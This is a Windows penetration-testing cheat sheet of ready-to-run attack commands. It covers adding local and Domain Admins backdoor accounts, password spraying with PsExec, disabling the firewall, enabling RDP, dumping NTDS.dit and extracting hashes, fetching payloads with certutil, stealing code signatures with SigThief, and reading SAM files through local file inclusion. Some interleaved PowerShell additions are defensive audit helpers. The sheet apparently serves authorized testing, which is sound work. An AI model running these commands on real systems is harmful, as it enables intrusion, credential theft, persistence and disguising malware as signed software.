
WindowsPentestCommands

Commands used in Windows penetration tests

Checking version

Run systeminfo on the target. There are two things to check: the system version (e.g. 10.0.17134) and the cumulative patches installed (KB).

Before October 2016, patches were individual. Since then, patches are cumulative: the most recent KB installed contains every patch released between October 2016 and that KB's release date.

If the Windows base system predates October 2016, you need to check both:

If the Windows base system postdates October 2016, checking the most recent KB installed is enough.
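As an added example (not part of the original cheat sheet), the following PowerShell reads the same two facts the text takes from systeminfo, the OS version and the installed KBs, and applies the October 2016 rule. It assumes the OS InstallDate is a usable stand-in for the "base system" date, which holds for a machine imaged before October 2016 and never reinstalled; treat that as a heuristic.

```powershell
# Added example, not from the original cheat sheet: summarise the two facts the
# text says to read out of systeminfo (OS version and installed KBs) and apply
# the October 2016 cumulative-update rule. Run in PowerShell on the host.
# Assumption: the OS InstallDate stands in for the "base system date"; a machine
# imaged before October 2016 and never reinstalled keeps that date.

$CumulativeCutover = [datetime]'2016-10-01'

function Get-PatchLevelSummary {
    $os = Get-CimInstance -ClassName Win32_OperatingSystem

    # Same data as the "Hotfix(s)" block of systeminfo, newest first.
    # Updates with no recorded date sort last, so they never win "latest".
    $hotfixes = @(Get-HotFix | Sort-Object -Property InstalledOn -Descending)
    $latest   = $hotfixes | Where-Object { $_.InstalledOn } | Select-Object -First 1

    if ($os.InstallDate -lt $CumulativeCutover) {
        # Individual patches: each relevant KB has to be checked one by one.
        $mode = 'Pre-Oct-2016 base: check the OS version and each individual KB'
    } else {
        # Cumulative patches: the newest KB implies everything released before it.
        $mode = 'Post-Oct-2016 base: the most recent cumulative KB is enough'
    }

    [pscustomobject]@{
        ComputerName      = $env:COMPUTERNAME
        OSVersion         = $os.Version        # e.g. 10.0.17134
        BuildNumber       = $os.BuildNumber
        InstallDate       = $os.InstallDate
        HotfixCount       = $hotfixes.Count
        LatestKB          = $latest.HotFixID
        LatestKBInstalled = $latest.InstalledOn
        CheckMode         = $mode
    }
}

Get-PatchLevelSummary | Format-List
```

Get-HotFix only lists updates recorded by the servicing stack, so a host patched through a third-party tool may show fewer entries than it really has; the systeminfo output has the same limitation.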

Listing disks

wmic logicaldisk get

List running services

GUI: services.msc

net start
sc query
wmic service get

List running processes

tasklist
wmic process

Stopping a process

taskkill /PID 10032 /F

Listing runkeys

reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
reg query HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
reg query HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
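The same keys enumerated as objects, as an added example that is not part of the original cheat sheet. It also covers the Wow6432Node views on 64-bit Windows, and the "Suspicious" column is an assumed triage heuristic (user-writable paths and script hosts), not a verdict. HKCU only covers the user running the script; other users' Run keys live under HKU.

```powershell
# Added example, not from the original cheat sheet: enumerate the Run/RunOnce
# keys queried above as objects and flag entries worth a second look.
# HKCU is the current user's hive only; other users' keys are under HKU.

$RunKeys = @(
    'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run',
    'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce',
    'HKLM:\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run',
    'HKLM:\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce',
    'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run',
    'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce'
)

# Assumed triage heuristic: autostart entries in user-writable locations, or
# launched through script hosts, deserve a closer look.
$SuspiciousPattern = '\\Temp\\|\\AppData\\|\\ProgramData\\|\\Public\\|powershell|wscript|cscript|mshta|rundll32|regsvr32'

function Get-RunKeyEntries {
    foreach ($key in $RunKeys) {
        if (-not (Test-Path -LiteralPath $key)) { continue }
        $item = Get-Item -LiteralPath $key
        foreach ($name in $item.GetValueNames()) {
            # Keep %VAR% references unexpanded so the stored value is shown as-is
            $cmd = $item.GetValue($name, $null,
                [Microsoft.Win32.RegistryValueOptions]::DoNotExpandEnvironmentNames)
            [pscustomobject]@{
                Key        = $key
                Name       = $name
                Command    = $cmd
                Suspicious = [bool]("$cmd" -match $SuspiciousPattern)
            }
        }
    }
}

Get-RunKeyEntries | Sort-Object -Property Suspicious -Descending | Format-Table -AutoSize -Wrap
```

Pipe the output to Export-Csv to keep a baseline; diffing two baselines is the simplest way to spot a newly added autorun.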

Listing scheduled tasks

GUI: taskschd.msc

PowerShell (limited information):

Get-ScheduledTask
Get-ScheduledTaskInfo

PowerShell (detailed information; warning: you need to be SYSTEM to see all tasks):

Get-ScheduledTask -TaskPath "\" |
    ForEach-Object {
        # -TaskPath "\" lists only tasks in the root folder; omit it to include subfolders.
        # Query the run-time info once per task instead of three times.
        $info = $_ | Get-ScheduledTaskInfo
        [pscustomobject]@{
            Server      = $env:COMPUTERNAME
            Name        = $_.TaskName
            Path        = $_.TaskPath
            Description = $_.Description
            Author      = $_.Author
            RunAsUser   = $_.Principal.UserId
            LastRunTime = $info.LastRunTime
            LastResult  = $info.LastTaskResult
            NextRun     = $info.NextRunTime
            Status      = $_.State
            Command     = $_.Actions.Execute
            Arguments   = $_.Actions.Arguments
        }
    }

Listing users

Get current user info

whoami
whoami /groups

List local users

net user

Get local user info

net user <username>

List domain users

net user /domain

Get domain user info

net user <username> /domain

Adding users

Locally

net user /add kek ABCabc123
net localgroup Administrators kek /add

Note: always use a password that satisfies the password policy when working from a webshell or reverse shell, because you may not see the error if the command fails.

Domain

Use this, for instance, after elevating your Kerberos privileges:

net user kek ABCabc123 /add /domain 
net group "Domain Admins" kek /add /domain

Permissions

Listing permissions

icacls C:\Windows\SYSVOL\whatever

Granting permissions

icacls C:\Windows\SYSVOL\whatever /grant "NT AUTHORITY\Authenticated Users":F
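An added example, not from the original cheat sheet, that does the reverse of the grant above: it walks a path and reports access control entries giving write-class rights (Write, Modify or FullControl) to broad low-privilege groups such as Authenticated Users. The list of "broad" identities, the depth limit and the path are assumptions to adjust; the script is read-only.

```powershell
# Added example, not from the original cheat sheet: find ACEs that grant
# write-class rights to broad, low-privilege groups, i.e. the kind of entry the
# icacls /grant above creates. Read-only. The identity list and depth are assumed.

function Find-BroadWriteAces {
    param(
        [Parameter(Mandatory)] [string] $Path,
        [int] $Depth = 2
    )
    $broadIdentities = @(
        'Everyone',
        'NT AUTHORITY\Authenticated Users',
        'NT AUTHORITY\INTERACTIVE',
        'BUILTIN\Users'
    )
    # Any of these bits set means the principal can change the object
    $writeMask = [System.Security.AccessControl.FileSystemRights]::Write -bor
                 [System.Security.AccessControl.FileSystemRights]::Modify -bor
                 [System.Security.AccessControl.FileSystemRights]::FullControl

    # The root object itself plus everything below it, down to $Depth levels
    $targets = @(Get-Item -LiteralPath $Path) +
               @(Get-ChildItem -LiteralPath $Path -Recurse -Depth $Depth -Force -ErrorAction SilentlyContinue)

    foreach ($t in $targets) {
        $acl = Get-Acl -LiteralPath $t.FullName -ErrorAction SilentlyContinue
        if (-not $acl) { continue }
        foreach ($ace in $acl.Access) {
            if ($ace.AccessControlType -ne 'Allow') { continue }
            if ($broadIdentities -notcontains $ace.IdentityReference.Value) { continue }
            if (([int]$ace.FileSystemRights -band [int]$writeMask) -eq 0) { continue }
            [pscustomobject]@{
                Path      = $t.FullName
                Identity  = $ace.IdentityReference.Value
                Rights    = $ace.FileSystemRights
                Inherited = $ace.IsInherited   # $false = set explicitly on this object
            }
        }
    }
}

Find-BroadWriteAces -Path 'C:\Windows\SYSVOL\whatever' | Format-Table -AutoSize
```

Entries with Inherited = $false are the ones somebody set directly on that object, which is what the icacls /grant command produces and what you usually want to review first.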

Capturing packets

netsh trace start persistent=yes capture=yes tracefile=C:\Users\whatever\trace.etl
netsh trace stop

Run a command as another user

runas /user:domain\user cmd.exe

Password spraying

This will pop a cmd for each pwned account:

for /f %i in (users.txt) do @(echo %i && PsExec.exe -u domain\%i -p P@ssw0rd cmd.exe)

Running remote commands

psexec \\remotecomputer.domain -u domain\user -p password ipconfig
winrs -r:remotecomputer cmd
wmic /node:remotecomputer process call create "cmd.exe /c start.exe"

Downloading a payload

certutil -urlcache -split -f "https://download.sysinternals.com/files/PSTools.zip" pstools.zip

Decode a base64 payload

certutil -decode test.exe.b64 test.exe

Check open ports

This one is PowerShell (tnc is an alias of Test-NetConnection):

tnc \\computer.domain -p 80
tnc 10.0.0.1 -p 443

Firewall

On older platforms (XP):

netsh.exe firewall set opmode mode=disable profile=all 

On newer platforms:

netsh advfirewall set currentprofile state off

Enable RDP

Authorizing the service

reg add "HKLM\SYSTEM\CurrentControlSet\services\TermService" /v Start /t REG_DWORD /d 3 /f
sc config termservice start= auto

Starting the service

net start TermService

Authorize remote connections

reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server"
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

At this point verify that the service is indeed listening:

netstat -a -p TCP
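As an added example (not part of the original cheat sheet), this PowerShell reads back every setting the three steps above touch, together with the NLA and security-layer settings and whether anything is bound to the configured port, without changing any of them. It assumes PowerShell 5 or later on Windows 8/Server 2012 or later, where Get-NetTCPConnection is available.

```powershell
# Added example, not from the original cheat sheet: read back the RDP state the
# three steps above change, plus NLA and the listener. Read-only.
# Assumes PowerShell 5+ on Windows 8 / Server 2012 or later (Get-NetTCPConnection).

function Get-RdpState {
    $svc   = Get-Service -Name TermService
    $tsKey = 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server'
    $ts    = Get-ItemProperty -Path $tsKey
    $rdp   = Get-ItemProperty -Path "$tsKey\WinStations\RDP-Tcp"

    # Is anything actually bound to the configured RDP port?
    $listener = Get-NetTCPConnection -State Listen -LocalPort $rdp.PortNumber -ErrorAction SilentlyContinue

    [pscustomobject]@{
        ServiceStatus     = $svc.Status
        ServiceStartType  = $svc.StartType          # registry Start value: 2 = Automatic, 3 = Manual, 4 = Disabled
        DenyTSConnections = $ts.fDenyTSConnections  # 0 = remote connections allowed
        Port              = $rdp.PortNumber         # 3389 by default
        NlaRequired       = $rdp.UserAuthentication # 1 = Network Level Authentication required
        SecurityLayer     = $rdp.SecurityLayer      # 0 = RDP, 1 = Negotiate, 2 = TLS
        Listening         = [bool]$listener
    }
}

Get-RdpState | Format-List
```

Note that the reg add above sets Start to 3 (manual) and the sc config line then changes it to automatic; the StartType field shows which one actually took effect.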

Dumping NTDS.dit

The preferred method is:

ntdsutil "ac i ntds" "ifm" "create full c:\.svg" q q

This might fail, so you could use a volume shadow copy instead:

vssadmin create shadow /for=c:

Extract hashes:

impacket-secretsdump -ntds /path/Active\ Directory/ntds.dit -system /path/registry/SYSTEM LOCAL

Forging Binary Signatures

Using Visual Studio: Windows > Developer Command Prompt for VS2017. Signtool is a command-line tool that digitally signs/unsigns files, verifies signatures in files, or timestamps files.

signtool sign /a /t C:\Path\To\Signature\signature.dll /v "C:\Path\To\The\File\file.exe"
signtool remove /s /v C:\Path\To\DLL\file.dll

Using SigThief: take the signature from one binary and apply it to another:

/sigthief.py -i ~/SignFromThisDll.dll -t ~/toThisDll.dll -o ~/FileWithBadSign.dll
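From the verification side, as an added example that is not part of the original cheat sheet: a signature copied from one binary onto another covers the wrong file hash, so Windows reports it as HashMismatch rather than Valid, while unsigned files show NotSigned and self-signed or unknown-CA certificates show NotTrusted. The script below runs Get-AuthenticodeSignature over every PE file under a folder; the path is a placeholder.

```powershell
# Added example, not from the original cheat sheet: verify Authenticode
# signatures across a folder of PE files. A copied signature (the SigThief
# technique above) shows up as HashMismatch; unsigned files as NotSigned;
# untrusted chains as NotTrusted. The path is a placeholder.

function Get-SignatureReport {
    param([Parameter(Mandatory)] [string] $Path)

    Get-ChildItem -LiteralPath $Path -Recurse -File -Include *.exe, *.dll, *.sys -ErrorAction SilentlyContinue |
        ForEach-Object {
            $sig = Get-AuthenticodeSignature -LiteralPath $_.FullName
            [pscustomobject]@{
                File        = $_.FullName
                Status      = $sig.Status          # Valid, NotSigned, HashMismatch, NotTrusted, ...
                Message     = $sig.StatusMessage
                Signer      = $sig.SignerCertificate.Subject
                Thumbprint  = $sig.SignerCertificate.Thumbprint
                TimeStamper = $sig.TimeStamperCertificate.Subject
            }
        }
}

# Show only what needs attention
Get-SignatureReport -Path 'C:\Path\To\Review' |
    Where-Object { $_.Status -ne 'Valid' } |
    Format-Table -Property Status, Signer, File -AutoSize
```

A Valid status only means the signature matches the file and chains to a trusted root; whether the signer is one you expect is a separate check, which is why the signer subject and thumbprint are included.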

Files to get via LFI

Check if the LFI works:

C:\Windows\win.ini

Fingerprinting the version:

C:\Windows\System32\eula.txt      (XP)
C:\Windows\System32\license.rtf   (Vista and above)

Dump the SAM database:

C:\WINDOWS\Repair\SAM
C:\WINDOWS\Repair\SYSTEM

Contributors: gquere, rbenhadj
